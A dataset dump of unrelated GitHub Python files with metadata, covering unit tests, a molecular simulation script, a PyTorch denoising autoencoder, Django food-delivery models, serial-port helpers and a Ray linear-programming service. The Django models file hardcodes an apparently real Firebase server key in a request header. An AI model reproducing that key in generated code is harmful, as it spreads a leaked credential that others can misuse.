        import_class = mock.Mock()
        options = {'context_class': mock.sentinel.context_class}
        with mock.patch('openstack.common.utils.import_class',
                        mock.Mock(return_value=import_class)):
            middleware = context.ContextMiddleware(mock.Mock(), options)
            middleware.make_context(mock.sentinel.arg)
            import_class.assert_called_with(mock.sentinel.arg)
class FilterFactoryTest(unittest.TestCase):
    """Unit tests for context.filter_factory()."""

    def test_filter_factory(self):
        app = mock.sentinel.app
        global_conf = dict(sentinel=mock.sentinel.global_conf)
        target = 'openstack.common.middleware.context.ContextMiddleware'

        def check_ctx_middleware(arg_app, arg_conf):
            # The factory must pass the wrapped app and the global
            # configuration through to the middleware class.
            self.assertEqual(app, arg_app)
            self.assertEqual(global_conf['sentinel'], arg_conf['sentinel'])
            return mock.DEFAULT

        with mock.patch(target,
                        mock.Mock(return_value=mock.sentinel.ctx)) as mid:
            mid.side_effect = check_ctx_middleware
            # NOTE: renamed the local (originally `filter`) so it no longer
            # shadows the built-in filter().
            filter_ = context.filter_factory(global_conf)
            self.assertEqual(filter_(app), mock.sentinel.ctx)
| emonty/openstack-common | tests/unit/middleware/test_context.py | test_context.py | py | 2,329 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "unittest.TestCase",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "mock.Mock",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "mock.Mock",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "mock.MagicMock",
"line... |
494409517 | # pylint doesn't understand pytest fixtures
# pylint: disable=unused-argument
from click.testing import CliRunner
from dagster_airflow.cli import scaffold
def test_build_dags(clean_airflow_home):
    """Scaffold Airflow DAGs for several example pipelines and verify that
    Airflow parses every generated DAG without import errors.

    Instantiating DagBag() triggers an Airflow DAG refresh of
    $AIRFLOW_HOME/dags; any parse failure is recorded in its
    ``import_errors`` mapping, so an empty mapping proves our codegen still
    emits valid DAG files.
    """
    scaffold_invocations = [
        ['--module-name', 'dagster_examples.toys.log_spew', '--pipeline-name', 'log_spew'],
        ['--module-name', 'dagster_examples.toys.many_events', '--pipeline-name', 'many_events'],
        [
            '--module-name',
            'dagster_examples.toys.error_monster',
            '--pipeline-name',
            'error_monster',
            '--preset',
            'passing',
        ],
        [
            '--module-name',
            'dagster_examples.toys.resources',
            '--pipeline-name',
            'resource_pipeline',
        ],
        ['--module-name', 'dagster_examples.toys.sleepy', '--pipeline-name', 'sleepy_pipeline'],
    ]
    runner = CliRunner()
    for cli_args in scaffold_invocations:
        runner.invoke(scaffold, cli_args)
        # Forces Airflow to refresh DAGs;
        # see https://stackoverflow.com/a/50356956/11295366
        from airflow.models import DagBag

        dag_bag = DagBag()
        # Any import error means a generated DAG failed to parse.
        assert not dag_bag.import_errors
        # The last CLI argument is always the pipeline name.
        assert cli_args[-1] in dag_bag.dags
| helloworld/continuous-dagster | deploy/dagster_modules/dagster-airflow/dagster_airflow_tests/test_build_dags.py | test_build_dags.py | py | 1,760 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "click.testing.CliRunner",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "dagster_airflow.cli.scaffold",
"line_number": 41,
"usage_type": "argument"
},
{
"api_name": "airflow.models.DagBag",
"line_number": 46,
"usage_type": "call"
}
] |
10315136743 | from __future__ import print_function
import sys
import mdtraj as md
from simtk.openmm import app
import simtk.openmm as mm
from simtk import unit
import argparse
class Tee(object):
    """Duplicate everything written to it to both a log file and the real
    stdout, so it can stand in for sys.stdout while keeping a log on disk."""

    def __init__(self, name, mode):
        self.file = open(name, mode)
        self.stdout = sys.stdout

    def write(self, data):
        self.file.write(data)
        # Flush so the log is readable while the simulation is still running
        # and is not lost if the process dies before the file is closed.
        self.file.flush()
        self.stdout.write(data)

    def flush(self):
        # File-like API completeness: some consumers call flush() explicitly.
        self.file.flush()
        self.stdout.flush()
if __name__ == '__main__':
    if len(sys.argv) != 3:
        # NOTE(review): the '%s' placeholder is never filled in — likely
        # `% sys.argv[0]` was intended; left unchanged here.
        print('usage %s <trajectory index (for output file)> <model index of starting conformation>')
        exit(1)
    # Load the starting structure and build an implicit-solvent AMBER system.
    pdb = md.load('100-fs-peptide-400K.pdb')
    forcefield = app.ForceField('amber99sbildn.xml', 'amber99_obc.xml')
    system = forcefield.createSystem(pdb.topology.to_openmm(), nonbondedMethod=app.CutoffNonPeriodic,
        nonbondedCutoff=1.0*unit.nanometers, constraints=app.HBonds)
    # Langevin dynamics at 300 K, 2 fs timestep, 91/ps friction.
    integrator = mm.LangevinIntegrator(300*unit.kelvin, 91.0/unit.picoseconds,
        2.0*unit.femtoseconds)
    integrator.setConstraintTolerance(0.00001)
    platform = mm.Platform.getPlatformByName('CPU')
    #properties = {'CudaPrecision': 'mixed', 'CudaDeviceIndex': sys.argv[1]}
    simulation = app.Simulation(pdb.topology.to_openmm(), system, integrator, platform)
    # argv[2] selects which model/frame of the multi-model PDB to start from.
    simulation.context.setPositions(pdb.xyz[int(sys.argv[2])])
    simulation.context.setVelocitiesToTemperature(300*unit.kelvin)
    # 1 ns of production, reporting every 10 ps.
    nsteps = int((1*unit.nanoseconds) / (2*unit.femtoseconds))
    interval = int((10*unit.picoseconds) / (2*unit.femtoseconds))
    # NOTE(review): open(..., 'w', 0) (unbuffered text mode) is Python-2 only;
    # Python 3 raises ValueError for buffering=0 on text files — confirm the
    # intended interpreter version.
    simulation.reporters.append(app.StateDataReporter(open('trajectory-%s.log' % sys.argv[1], 'w', 0),
        interval, step=True, time=True, progress=True,
        potentialEnergy=True, temperature=True, remainingTime=True,
        speed=True, totalSteps=nsteps, separator='\t'))
    # equilibrate
    simulation.step(int(100*unit.picoseconds / (2*unit.femtoseconds)))
    # now add the trajectory reporter.
    simulation.reporters.append(app.DCDReporter('trajectory-%s.dcd' % sys.argv[1], interval))
    simulation.step(nsteps)
| vivek-bala/adaptive-msm-openmm | entk2/fs-peptide/simulate-fs.py | simulate-fs.py | py | 2,035 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sys.stdout",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "mdtraj.load",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "simtk.openmm.app.ForceField... |
5134070317 | from PyQt5.QtWidgets import QListWidget, QListWidgetItem
from PyQt5.QtWidgets import QWidget, QVBoxLayout
from whispering_assistant.window_managers.windows.base_window_template import BaseWindowTemplate
class ChoiceWindow(BaseWindowTemplate):
    """Window presenting a list of choices; double-clicking an item invokes
    ``process_cb`` with the chosen entry and closes the window.

    Each element of ``choices`` is expected to be a dict with at least a
    'display_text' key.
    """

    def __init__(self, parent=None, choices=None, process_cb=None):
        # BUG FIX: the previous default `choices=[]` was a shared mutable
        # default argument; normalise None -> fresh list instead.
        choices = [] if choices is None else choices
        super().__init__(parent, choices=choices, process_cb=process_cb)

    def initUI(self, choices, process_cb):
        """Build the list widget, populate it from ``choices`` and show the window."""
        self.setWindowTitle("Select the desired link")
        self.setGeometry(1000, 500, 1600, 200)
        self.selected_index = None
        self.choices = choices
        self.process_cb = process_cb
        central_widget = QWidget(self)
        layout = QVBoxLayout(central_widget)
        self.list_widget = QListWidget(central_widget)
        for choice in choices:
            display_text = choice['display_text']
            list_item = QListWidgetItem(display_text)
            self.list_widget.addItem(list_item)
        self.list_widget.itemDoubleClicked.connect(self.on_item_double_clicked)
        layout.addWidget(self.list_widget)
        central_widget.setLayout(layout)
        self.setCentralWidget(central_widget)
        self.show()

    def on_item_double_clicked(self, item):
        """Resolve the clicked row to its choice dict and hand it to the callback."""
        self.selected_index = self.list_widget.row(item)
        print("self.selected_index", self.selected_index, self.choices[self.selected_index])
        selected_item = self.choices[self.selected_index]
        if self.process_cb:
            self.process_cb(selected_item)
        self.close()
| engrjabi/WhisperingAssistant | whispering_assistant/window_managers/windows/choice_window.py | choice_window.py | py | 1,535 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "whispering_assistant.window_managers.windows.base_window_template.BaseWindowTemplate",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "PyQt5.QtWidgets.QWidget",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "PyQt5.QtWidgets.QVBoxLayout",
"li... |
43678975341 | # importing the requests library
import requests
import time
# defining the api-endpoint (local HSTM flask server)
URL = "http://127.0.0.1:5000/add"
# data to be sent to api: one synthetic sensor reading, timestamped now
PARAMS = {
    'TimeStamp':time.time(),
    'Temp1':'24.00',
    'Temp2':'24.00',
    'TAmbiant':'23.00',
    'Humidity':'35'}
# sending post request and saving response as response object
# (form-encoded body; presumably the /add endpoint reads request.form — confirm)
r = requests.post(url = URL, data = PARAMS)
print("The response is %s"%r)
# extracting response text
pastebin_url = r.text
print("The Response Body is:%s"%pastebin_url)
{
"api_name": "time.time",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "requests.post",
"line_number": 16,
"usage_type": "call"
}
] |
323540718 | # -*- coding: utf-8 -*-
"""Console script for mcc."""
import os
import click
from pydub import AudioSegment
from pydub.silence import split_on_silence
@click.command()
@click.argument('sound_path')
@click.option('--mls', default=500, help='沉默的时长,毫秒')
@click.option('--st', default=-30, help='无声的界限,如果比这个数值更小则认为是无声')
@click.option('--name', default=0, help='分割出来文件的名字,默认从0开始')
def main(sound_path, mls, st, name):
    """Split a recording on its silent gaps, one wav file per spoken chunk."""
    sound = AudioSegment.from_wav(sound_path)
    chunks = split_on_silence(sound,
                              # minimum length of a silence, in milliseconds
                              min_silence_len=mls,
                              # anything quieter than this dBFS threshold counts as silence
                              silence_thresh=st
                              )
    print(f'碎片数量: {len(chunks)}')
    # Output directory named after the produced file index range, e.g. "0-11".
    dirname = f'{name}-{name + len(chunks) - 1}'
    # exist_ok avoids the check-then-create race of os.path.exists + makedirs.
    os.makedirs(dirname, exist_ok=True)
    for i, chunk in enumerate(chunks):
        # Export each chunk as <dirname>/<name+i>.wav
        chunk.export(f'{dirname}/{name + i}.wav', format='wav')
| nanke-ym/mcc | mcc/split.py | split.py | py | 1,227 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pydub.AudioSegment.from_wav",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "pydub.AudioSegment",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "pydub.silence.split_on_silence",
"line_number": 19,
"usage_type": "call"
},
{
"api... |
44395709703 | import torch
import numpy as np
from book.pytorch.utils.helper import get_mnist_loader
import torch.nn.functional as F
from torch import nn
import matplotlib.pyplot as plt
class ConvDenoiser(nn.Module):
    """Convolutional denoising autoencoder for 1x28x28 images.

    NOTE(review): ``encoding_dim`` is accepted but never used; kept for
    signature compatibility with existing callers.
    """

    def __init__(self, encoding_dim):
        super(ConvDenoiser, self).__init__()
        # --- encoder: three 3x3 convs, each followed by 2x2 max pooling ---
        self.conv1 = nn.Conv2d(1, 32, 3, padding=1)    # depth 1 -> 32
        self.conv2 = nn.Conv2d(32, 16, 3, padding=1)   # depth 32 -> 16
        self.conv3 = nn.Conv2d(16, 8, 3, padding=1)    # depth 16 -> 8
        self.pool = nn.MaxPool2d(2, 2)                 # halves spatial dims
        # --- decoder: transpose convs upsample 3x3 -> 7x7 -> 14x14 -> 28x28 ---
        self.t_conv1 = nn.ConvTranspose2d(8, 8, 3, stride=2)    # kernel 3 to reach 7x7
        self.t_conv2 = nn.ConvTranspose2d(8, 16, 2, stride=2)
        self.t_conv3 = nn.ConvTranspose2d(16, 32, 2, stride=2)
        # final plain conv brings the depth back down to one channel
        self.conv_out = nn.Conv2d(32, 1, 3, padding=1)

    def forward(self, x):
        # Encoder: conv + ReLU, then pool, three times.
        for conv in (self.conv1, self.conv2, self.conv3):
            x = self.pool(F.relu(conv(x)))
        # Decoder: transpose conv + ReLU, three times.
        for t_conv in (self.t_conv1, self.t_conv2, self.t_conv3):
            x = F.relu(t_conv(x))
        # Squash the reconstruction into [0, 1] pixel intensities.
        return torch.sigmoid(self.conv_out(x))
if __name__ == '__main__':
    """
    used to denoise images quite successfully just by training the network on noisy images
    """
    batch_size = 20
    train_loader, test_loader, valid_loader = get_mnist_loader(batch_size=batch_size, is_norm=False)
    model = ConvDenoiser(encoding_dim=32)
    print(model)
    """comparing pixel values in input and output images, it's best to use a loss that meant for a regression task"""
    criterion = nn.MSELoss()
    optimizer = torch.optim.Adam(model.parameters(), lr=0.001)
    noise_factor = 0.5  # for adding noise to images
    n_epochs = 20
    for epoch in range(1, n_epochs + 1):
        train_loss = 0.0
        for data in train_loader:
            images, _ = data
            # add random noise to the input images
            noisy_imgs = images + noise_factor * torch.randn(*images.shape)
            # clip the images to be between 0 and 1
            noisy_imgs = np.clip(noisy_imgs, 0., 1.)
            optimizer.zero_grad()
            outputs = model(noisy_imgs)
            # the "target" is still the original, not-noisy images
            loss = criterion(outputs, images)
            loss.backward()
            optimizer.step()
            train_loss += loss.item() * images.size(0)
        # print avg training statistics
        train_loss = train_loss / len(train_loader)
        print('Epoch: {} \tTraining Loss: {:.6f}'.format(epoch, train_loss))
    # check test
    dataiter = iter(test_loader)
    # NOTE(review): `.next()` on DataLoader iterators is removed in newer
    # PyTorch — `next(dataiter)` is the portable spelling.
    images, labels = dataiter.next()
    # add noise to the test images
    noisy_imgs = images + noise_factor * torch.randn(*images.shape)
    noisy_imgs = np.clip(noisy_imgs, 0., 1.)
    output = model(noisy_imgs)
    noisy_imgs = noisy_imgs.numpy()  # prep images for display
    # output is resized into a batch of images
    output = output.view(batch_size, 1, 28, 28)
    # use detach when it's an output that requires_grad
    output = output.detach().numpy()
    # plot the first ten input images and then reconstructed images
    fig, axes = plt.subplots(nrows=2, ncols=10, sharex=True, sharey=True, figsize=(25, 4))
    # input images on top row, reconstructions on bottom
    for noisy_imgs, row in zip([noisy_imgs, output], axes):
        for img, ax in zip(noisy_imgs, row):
            ax.imshow(np.squeeze(img), cmap='gray')
            ax.get_xaxis().set_visible(False)
            ax.get_yaxis().set_visible(False)
    plt.show()
| jk983294/morph | book/pytorch/autoencoder/cnn_denoise.py | cnn_denoise.py | py | 4,398 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "torch.nn.Module",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "torch.nn.Conv2d",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_numb... |
718069407 |
from django.db import models
from django.contrib.auth.models import User
from django.db.models.query import ModelIterable
from django.db.models.signals import post_save, post_init
import requests
import random
def sendNotification(usertoken, title, body):
    """Send a push notification to one device via Firebase Cloud Messaging.

    Args:
        usertoken: FCM device registration token of the recipient.
        title: notification title shown in the tray.
        body: notification body text.
    """
    userdata = {
        "to": str(usertoken),
        "notification": {
            # BUG FIX: `title` and `body` were previously swapped
            # ("body": str(title), "title": str(body)).
            "title": str(title),
            "body": str(body),
            "content_available": True,
            "priority": "high"
        }
    }
    headers = {
        "Authorization": "key=AAAAwVFO9Fw:APA91bHymQMWRKlGHZOVMxp4_-0HA5vOlybPEpCU7NHOs1v9lkkd5JrtYzsU_3UYH5-nxcSZYA9xUOVYfpyKPE_YFdL2BgCKUvbIBBNuqfvIAOcbjLZ6eQ7o4SCAFG1UGBp8X7JnB2HI",
        "Content-Type": "application/json"
    }
    # Fire-and-forget: the response is not inspected by any caller.
    requests.post(
        'https://fcm.googleapis.com/fcm/send', json=userdata, headers=headers)
class CustomerProfile(models.Model):
    """One-to-one profile extension for a customer account."""
    user = models.OneToOneField(User, on_delete=models.CASCADE, blank=True)
    # aadharNo = models.IntegerField(default=0)
    phoneNo = models.CharField(max_length=10, blank=True)

    def __str__(self):
        return "%s's profile" % self.user
class DeliveryProfile(models.Model):
    """One-to-one profile extension for a delivery-person account."""
    user = models.OneToOneField(User, on_delete=models.CASCADE, blank=True)
    # aadharNo = models.IntegerField(default=0)
    phoneNo = models.CharField(max_length=10, blank=True)

    def __str__(self):
        return "%s's profile" % self.user
class ShopLocality(models.Model):
    """Named locality/area a shop (or an order's delivery) belongs to."""
    name = models.CharField(max_length=500)

    def __str__(self):
        return self.name
class Shop(models.Model):
    """A vendor's shop, with geolocation, contact details and current offer."""
    vendor = models.ForeignKey(
        User, on_delete=models.CASCADE, blank=True, null=True)
    name = models.CharField(max_length=500)
    currentOffer = models.FloatField()
    # URL of the shop's banner image (defaults to a stock photo).
    ShopImg = models.CharField(max_length=500, blank=True,
                               default="https://images.unsplash.com/photo-1498837167922-ddd27525d352?ixid=MXwxMjA3fDB8MHxwaG90by1wYWdlfHx8fGVufDB8fHw%3D&ixlib=rb-1.2.1&auto=format&fit=crop&w=1050&q=80.jpg")
    locality = models.ForeignKey(
        ShopLocality, on_delete=models.CASCADE, null=True)
    latitude = models.FloatField(null=True)
    longitude = models.FloatField(null=True)
    addressinwords = models.CharField(
        max_length=1000, default="")
    phoneNo = models.CharField(max_length=10, blank=True)
    # NOTE(review): max_length=10 is almost certainly too short for an
    # email address — confirm intended limit.
    email = models.CharField(max_length=10, blank=True)
    date = models.DateField(auto_now_add=True, null=True)
    time = models.TimeField(auto_now_add=True, null=True)

    def __str__(self):
        return self.name
class ProductCategory(models.Model):
    """Category a product belongs to (e.g. a menu section)."""
    name = models.CharField(max_length=500)

    def __str__(self):
        return self.name
class Product(models.Model):
    """A single product sold by a shop."""
    name = models.CharField(max_length=500)
    price = models.FloatField()
    shop = models.ForeignKey(Shop, on_delete=models.CASCADE, null=True)
    category = models.ForeignKey(
        ProductCategory, on_delete=models.CASCADE, null=True)
    # URL of the product photo (defaults to a stock image).
    productImage = models.CharField(
        max_length=500, default="https://images.unsplash.com/photo-1458642849426-cfb724f15ef7?ixid=MXwxMjA3fDB8MHxwaG90by1wYWdlfHx8fGVufDB8fHw%3D&ixlib=rb-1.2.1&auto=format&fit=crop&w=1050&q=80")

    def __str__(self):
        return self.name
class PaymentCategory(models.Model):
    """Payment method for an order (e.g. cash, online)."""
    name = models.CharField(max_length=500)

    def __str__(self):
        return self.name
class CustomerOrder(models.Model):
    """A customer's order.

    FCM push notifications are fired whenever ``status`` changes; see the
    ``post_save``/``remember_status`` signal handlers below (wired up at
    module level).
    """
    orderFor = models.ForeignKey(
        User, on_delete=models.CASCADE, blank=True)
    product = models.ManyToManyField(
        Product, blank=True)
    shop = models.ForeignKey(Shop, on_delete=models.CASCADE, null=True)
    latitude = models.FloatField(null=True)
    longitude = models.FloatField(null=True)
    date = models.DateField(auto_now_add=True, null=True)
    time = models.TimeField(auto_now_add=True, null=True)
    orderImg = models.CharField(
        max_length=500, null=True, default="https://images.unsplash.com/photo-1498837167922-ddd27525d352?ixid=MXwxMjA3fDB8MHxwaG90by1wYWdlfHx8fGVufDB8fHw%3D&ixlib=rb-1.2.1&auto=format&fit=crop&w=1050&q=80.jpg")
    # Free-form status string; post_save reacts to "shopreject", "pending",
    # "inorder" and "delivered".
    status = models.CharField(max_length=1000, null=True)
    orderPrice = models.FloatField(default=100)
    deliveryboy = models.ForeignKey(
        DeliveryProfile, on_delete=models.CASCADE, null=True, blank=True)
    locality = models.ForeignKey(
        ShopLocality, on_delete=models.CASCADE, null=True, blank=True)
    addressinwords = models.CharField(
        max_length=1000, default="")
    typeOfPayment = models.ForeignKey(
        PaymentCategory, on_delete=models.CASCADE, null=True)
    # OTP == 0 marks a freshly created order; a 4-digit code is generated
    # on first save (see post_save).
    OTP = models.IntegerField(null=True, default=0)
    payment_status = models.CharField(
        max_length=100, null=True, blank=True)

    @staticmethod
    def post_save(sender, **kwargs):
        """post_save signal handler: push FCM notifications on status changes
        and generate the delivery OTP for new orders."""
        instance = kwargs.get('instance')
        if instance.previous_status != instance.status or instance.OTP == 0:
            print("status changed")
            try:
                try:
                    user = FireabaseToken.objects.filter(
                        user=instance.orderFor).first()
                    usertoken = user.token
                    vendor = FireabaseToken.objects.filter(
                        user=instance.shop.vendor).first()
                    vendortoken = vendor.token
                except:
                    # NOTE(review): missing tokens are silently ignored; the
                    # sends below then fail and are swallowed by the outer
                    # except as well.
                    pass
                status = instance.status
                if instance.OTP == 0:
                    instance.OTP = random.randint(1000, 9999)
                    # Persist the OTP; this re-enters the handler, but OTP is
                    # no longer 0 then.
                    instance.save()
                    sendNotification(vendortoken, 'New Order',
                                     "A new order has been placed")
                    sendNotification(usertoken, 'Order Placed',
                                     "Order has been placed awaiting for the restaurant response")
                # NOTE(review): the strings below contain typos ("Staus",
                # "beign", "recived") — left unchanged as they are
                # user-visible runtime text.
                elif status == "shopreject":
                    sendNotification(
                        usertoken, 'Order Staus', "Your order has been denied")
                elif status == "pending":
                    sendNotification(usertoken, 'Order Status',
                                     "Your order is beign prepared")
                elif status == "inorder":
                    sendNotification(usertoken, 'Order Staus',
                                     "Your order is on the way")
                elif status == "delivered":
                    sendNotification(usertoken, 'Order Status',
                                     "You have recived your order")
            except:
                pass

    @staticmethod
    def remember_status(sender, **kwargs):
        """post_init signal handler: snapshot the loaded status so post_save
        can detect transitions."""
        instance = kwargs.get('instance')
        instance.previous_status = instance.status
# Wire the signal handlers: post_init snapshots the status so post_save can
# detect transitions and push the matching FCM notification.
post_save.connect(CustomerOrder.post_save, sender=CustomerOrder)
post_init.connect(CustomerOrder.remember_status, sender=CustomerOrder)
class ProductQuanities(models.Model):
    """Per-order line item: how many units of a product an order contains.

    NOTE(review): class name has a typo ("Quanities"); renaming would
    require a migration, so it is left as-is.
    """
    product = models.ForeignKey(
        Product, on_delete=models.CASCADE, blank=True)
    quantity = models.IntegerField()
    orderID = models.ForeignKey(
        CustomerOrder, on_delete=models.CASCADE, blank=True, null=True)
class FireabaseToken(models.Model):
    """FCM device registration token for a user.

    NOTE(review): class name has a typo ("Fireabase"); it is referenced by
    CustomerOrder.post_save, so renaming would touch several places.
    """
    token = models.CharField(max_length=500)
    user = models.OneToOneField(
        User, on_delete=models.CASCADE, blank=True, null=True)

    def __str__(self):
        return self.token
class StoreImage(models.Model):
    """An uploaded image file (served from MEDIA storage)."""
    image = models.ImageField()

    def __str__(self):
        return self.image.url
| haydencordeiro/FoodDeliveryDjango | food/models.py | models.py | py | 7,454 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "requests.post",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "django.db.models.Model",
"line_number": 30,
"usage_type": "attribute"
},
{
"api_name": "django.db.models",
"line_number": 30,
"usage_type": "name"
},
{
"api_name": "django.db.... |
10556749786 | import serial
import tkinter
from tkinter import*
TTY_DEVICE = "COM"
s=serial.Serial()
def init(port, text2):
    """Open COM<port> at 115200 baud (10 s timeout) and log the result.

    Failures (port absent or busy) are silently ignored.
    """
    global s
    try:
        s = serial.Serial(TTY_DEVICE + str(port), 115200, timeout=10)
        print('connect com' + str(port))
        # The log widget is kept read-only; enable it just long enough to write.
        text2.configure(state=tkinter.NORMAL)
        text2.insert(1.0, 'connect COM' + str(port) + "\n")
        text2.configure(state=tkinter.DISABLED)
    except (OSError, serial.SerialException):
        pass
def disconnect(text2):
    """Close the shared COM port and log the disconnect to the UI widget."""
    global s
    text2.configure(state=tkinter.NORMAL)
    text2.insert(1.0, 'COM-port Disconnect' + "\n")
    text2.configure(state=tkinter.DISABLED)
    s.close();
    print('COM-port Disconnect')
def write(text):
    """Write raw data to the open COM port; log if the port has gone away."""
    global s
    try:
        s.write(text)
    except serial.SerialException:
        print('com port disconnect')
def read():
    """Read everything currently waiting in the input buffer.

    NOTE(review): on Python 3, str(bytes) yields "b'...'" — a .decode() is
    probably intended; confirm the target Python version.
    Returns None on SerialException.
    """
    global s
    try:
        text = str(s.read(s.inWaiting()));
        return text
    except serial.SerialException:
        print('com port disconnect')
def findCom():
    """Probe COM0..COM49 and return the list of port numbers that open.

    Note: the return sits in the for-loop's ``else`` clause; since the loop
    contains no ``break`` it always executes after the scan completes.
    """
    global s
    s.close()
    print('com close')
    comAvable = []
    for i in range(0, 50):
        try:
            # Open-and-close just to test availability.
            s = serial.Serial(TTY_DEVICE + str(i), 115200, timeout=10)
            comAvable.append(i)
            s.close()
            print('Serial close')
        except (OSError, serial.SerialException):
            pass
    else:
        return comAvable
{
"api_name": "serial.Serial",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "serial.Serial",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "tkinter.NORMAL",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "tkinter.DISABLED",
... |
72053024743 | import numpy as np
from scipy.optimize import fsolve
import matplotlib.pyplot as plt
from mars import Mars
# Radiative/thermal parameters (placeholder values; see mars.py).
emissivity_dessert = 0.5
emissivity_PV = 0.5
absorptivity_dessert = 0.5
absorptivity_PV = 0.5
delta_time = 24 * 60 * 60  # one-day time step, in seconds
f = 0.15
cp = 1
T_Atmosphere = 200
rho = 1
num_days = 700
# formula not given. Just a placeholder. replace values in mars.py
x = 1e-5
# NOTE(review): this rebinding shadows the imported `Mars` class with an
# instance of it — rename the instance if the class is ever needed again.
Mars = Mars(absorptivity_PV, absorptivity_dessert, emissivity_dessert, emissivity_PV, delta_time, f,
            cp, T_Atmosphere, rho, x)
# Just any simulated values. Replace by real ones. Numpy vector and each entry is average of the given day
L_in = np.cos(np.linspace(0, 2 * np.pi, num_days)) * 5 + 5
S_in = np.cos(np.linspace(0, 2 * np.pi, num_days)) * 5 + 5
r_H_dessert = np.ones(shape=num_days)
r_H_PV = r_H_dessert / 2
# Initial guess: 273 K everywhere; vector holds both temperature series.
Temperature_init = np.ones(shape=(2 * num_days,)) * 273
# Solve the coupled energy-balance system for the two temperature series.
root = fsolve(lambda Temperature: Mars.system(Temperature, num_days=num_days, l_in=L_in, s_in=S_in,
                                              r_H_PV=r_H_PV, r_H_dessert=r_H_dessert),
              Temperature_init)
# First half of the solution vector vs. second half, per day.
plt.figure()
plt.plot(np.arange(0, num_days), root[0:num_days])
plt.plot(np.arange(0, num_days), root[num_days:2 * num_days])
plt.show()
| muedavid/Mars | main.py | main.py | py | 1,207 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "mars.Mars",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "numpy.cos",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "numpy.linspace",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "numpy.pi",
"line_number": 25,
... |
37779455706 | import json
from datetime import datetime as dt
from datetime import date as dto
import copy
class ProcessJsonPortfolio:
    """Helpers for post-processing a JSON-loaded portfolio dictionary."""

    def calculate_average_price(self, _dict):
        """Calculate dollar cost average per security.

        Args:
            _dict (dict): Portfolio loaded from json. The input is not
                mutated; an annotated deep copy is returned.

        Returns:
            tuple: (annotated portfolio, list of securities, list of holdings)
        """
        securities = []
        holdings = []
        result = copy.deepcopy(_dict)
        for ticker, entry in _dict.items():
            if ticker == 'test':
                continue
            share_count = 0
            cost_basis = 0
            # Each lot: {'Date': ..., 'Shares': ..., 'Executed Price': ...}
            for lot_idx, lot in enumerate(entry['Lots']):
                share_count += lot['Shares']
                cost_basis += lot['Executed Price'] * lot['Shares']
                # Mark the lot as consumed in the returned copy only.
                result[ticker]['Lots'][lot_idx]['Processed'] = "True"
            result[ticker]['Total Holdings'] = share_count
            result[ticker]['Total Cost'] = cost_basis
            result[ticker]['Average Cost'] = cost_basis / share_count
            securities.append(ticker)
            holdings.append(share_count)
        return result, securities, holdings

    def get_earliest_date(self, _dict):
        """Return the earliest date among lots not yet marked Processed.

        Defaults to today's date when every lot has been processed.
        """
        earliest = dto.today()
        for ticker, entry in _dict.items():
            if ticker == 'test':
                continue
            for lot in entry['Lots']:
                if lot.get('Processed') == "True":
                    continue
                lot_date = dt.strptime(lot['Date'], '%Y-%m-%d').date()
                earliest = min(earliest, lot_date)
        return earliest
| lzy7071/portfolio_tools | portfolio_tools/util/process_json_portfolio.py | process_json_portfolio.py | py | 1,929 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "copy.deepcopy",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "datetime.date.today",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "datetime.date",
"line_number": 44,
"usage_type": "name"
},
{
"api_name": "datetime.datetime.str... |
31279947642 | from ray import serve
from typing import List, Dict
import json
import numpy as np
from scipy.optimize import linprog
@serve.deployment(num_replicas=1, ray_actor_options={"num_cpus": 1, "num_gpus": 0})
class LinearProgrammingService(object):
    """Ray Serve deployment wrapping scipy.optimize.linprog."""
    # def __init__(self):
    def LinearProgramming(self, body: Dict):
        """Solve the LP described by ``body``.

        Expected keys: 'MinOrMax' ('min'/'max'), 'target' (objective
        coefficients), 'A', 'b' (inequality constraints A x <= b), 'bounds'.

        Returns a dict with 'OptimalValue' and 'OptimalSolution' on success;
        NOTE(review): falls through to an implicit None on failure — confirm
        callers handle that. For 'max' problems 'OptimalValue' is the
        negated maximum (the objective is negated but the sign of res.fun
        is not flipped back).
        """
        print(123)
        try:
            event = body
            MinOrMax = event['MinOrMax']
            target = event['target']
            A = event['A']
            b = event['b']
            bounds = event['bounds']
            print("线性规划求解器:")
            if MinOrMax == 'min':
                pass
            elif MinOrMax == 'max':
                # linprog minimizes, so negate the objective to maximize.
                target = np.array(target) * (-1)
            # minimize
            res = linprog(target, A, b, bounds=bounds)
        except Exception as e:
            print(e)
            print(e.__traceback__.tb_frame.f_globals["__file__"])  # file where the exception occurred
            print(e.__traceback__.tb_lineno)  # line number of the exception
        else:
            print("success")
            return {
                "OptimalValue": res.fun,
                "OptimalSolution": res.x
            }
| tju-hwh/Yet-Another-Serverless-Benchmark | solver/ray_stateful/so/service/linear_programming.py | linear_programming.py | py | 1,180 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "typing.Dict",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "numpy.array",
"line_number": 29,
